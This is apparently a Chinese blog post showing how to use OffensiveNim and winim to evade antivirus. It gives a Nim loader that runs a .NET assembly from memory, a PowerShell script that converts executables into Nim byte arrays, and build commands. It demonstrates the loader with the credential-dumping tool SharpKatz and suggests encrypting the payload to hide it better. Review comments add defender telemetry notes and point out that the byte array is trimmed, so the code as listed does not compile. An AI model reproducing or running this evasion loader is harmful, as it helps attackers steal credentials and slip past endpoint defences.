使用OffensiveNim绕过常见杀软。
主要用到的库是 winim。
import winim/clr
import sugar
import strformat
# Just pops a message box... or does it? ;)
#
# NOTE(review): `buf` is declared as array[4608, byte] but the literal below
# holds only four bytes (0x4d 0x5a = "MZ", the start of a DOS/PE header).
# Nim rejects an array literal whose length differs from the declared size,
# so the full byte array was presumably trimmed out of this listing.
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
# List the CLR versions found on the host (clrVersions from winim/clr).
echo "[*] Installed .NET versions"
for v in clrVersions():
  echo fmt" \--- {v}"
echo "\n"
echo ""
# Load the byte buffer as a managed assembly without writing it to disk.
# From a defender's view this is the observable event: a native (non-.NET)
# process brings in the CLR and raises an assembly load for an image with no
# backing file (visible through the .NET runtime ETW assembly-load events;
# .NET Framework 4.8+ also passes Assembly.Load buffers to AMSI).
var assembly = load(buf)
dump assembly  # sugar's `dump` prints the expression text and its value
# NOTE(review): despite the comment, this is a one-element BSTR array holding
# an empty string, so Main presumably receives string[] {""} rather than an
# empty array — confirm the target tolerates that.
var arr = toCLRVariant([""], VT_BSTR) # Passing no arguments
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
arr = toCLRVariant(["From Nim & .NET!"], VT_BSTR) # Actually passing some args
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
作者提供了一个 PowerShell 脚本，将 exe 转为符合 Nim 语法的字节数组。
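function CSharpToNimByteArray
{
    <#
    .SYNOPSIS
    Writes a file's bytes as a Nim `array[N, byte]` literal next to the input file.

    .DESCRIPTION
    Reads every byte of the input and writes
    `var buf: array[N, byte] = [byte 0xAA,0xBB,...]` to "<input>NimByteArray.txt".
    With -folder, every file directly inside the given directory is converted.
    Bytes are read with [System.IO.File]::ReadAllBytes so the function works on
    both Windows PowerShell 5.1 and PowerShell 7 (`Get-Content -Encoding Byte`
    was removed in PowerShell 6+). Empty files are skipped with a warning,
    because the literal `[byte 0x]` they would produce is not valid Nim.

    .PARAMETER inputfile
    Path to the file to convert, or to a directory when -folder is given.

    .PARAMETER folder
    Treat -inputfile as a directory and convert each file found directly in it.
    #>
    Param
    (
        [string]
        $inputfile,
        [switch]
        $folder
    )

    # Converts a single file and writes the literal beside it; returns the output path,
    # or $null when the file was skipped.
    function ConvertOne([string] $path)
    {
        Write-Host "Converting $path"
        $outfile = $path + "NimByteArray.txt"
        # Resolve against the PowerShell location: .NET APIs use the process CWD, which may differ.
        $fullPath = (Resolve-Path -LiteralPath $path).ProviderPath
        [byte[]] $bytes = [System.IO.File]::ReadAllBytes($fullPath)
        if ($bytes.Length -eq 0)
        {
            Write-Warning "Skipping empty file $path"
            return $null
        }
        # ',0x' joins consecutive hex pairs; the first '0x' comes from the prefix below.
        $hexString = ($bytes | ForEach-Object { $_.ToString('X2') }) -join ',0x'
        $Results = "var buf: array[" + $bytes.Length + ", byte] = [byte 0x" + $hexString + "]"
        $Results | Out-File $outfile
        return $outfile
    }

    if ($folder)
    {
        $Files = Get-ChildItem -Path $inputfile -File
        foreach ($file in $Files)
        {
            ConvertOne $file.FullName | Out-Null
        }
        Write-Host -ForegroundColor yellow "Results Written to the same folder"
    }
    else
    {
        $outfile = ConvertOne $inputfile
        if ($outfile) { Write-Host "Result Written to $outfile" }
    }
}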
测试SharpKatz
体积有点大。
编译
# Cross-compile with the MinGW toolchain (-d=mingw) for 64-bit Windows (--cpu=amd64);
# --app=console produces a console-subsystem binary, so the echo output is visible in a terminal.
nim c -d=mingw --app=console --cpu=amd64 execute_assembly.nim
Bingo
体积只有800k。
现在还没法传入自定义参数，源码修改后如下：
import winim/clr
import sugar
import strformat
import os
# Just pops a message box... or does it? ;)
# NOTE(review): as in the first listing, a four-byte literal cannot satisfy
# array[4608, byte]; the real buffer was presumably trimmed for the post.
var buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0]
# List the CLR versions found on the host (clrVersions from winim/clr).
echo "[*] Installed .NET versions"
for v in clrVersions():
  echo fmt" \--- {v}"
echo "\n"
echo ""
# In-memory load of the assembly (winim/clr `load`). The host-level telemetry
# is the same as for the first listing: the CLR appears in a native process and
# an assembly with no backing file is loaded (.NET runtime ETW assembly-load
# events; .NET Framework 4.8+ also passes Assembly.Load buffers to AMSI).
var assembly = load(buf)
dump assembly  # sugar's `dump` prints the expression text and its value
# Collect every command-line argument (indices 1..paramCount()) so they are
# forwarded to the assembly's entry point instead of hard-coded strings.
var cmd: seq[string]
var i = 1
while i <= paramCount():
  cmd.add(paramStr(i))
  inc(i)
echo cmd
# NOTE(review): when no arguments are given `cmd` is an empty seq, whereas the
# earlier listing passed [""]; confirm the target's Main accepts an empty array.
var arr = toCLRVariant(cmd, VT_BSTR)
assembly.EntryPoint.Invoke(nil, toCLRVariant([arr]))
OJBK.
要更进一步隐藏的话，需要对字节进行加密解密。
nim感觉搞懂winim这个库就能写好多小工具了。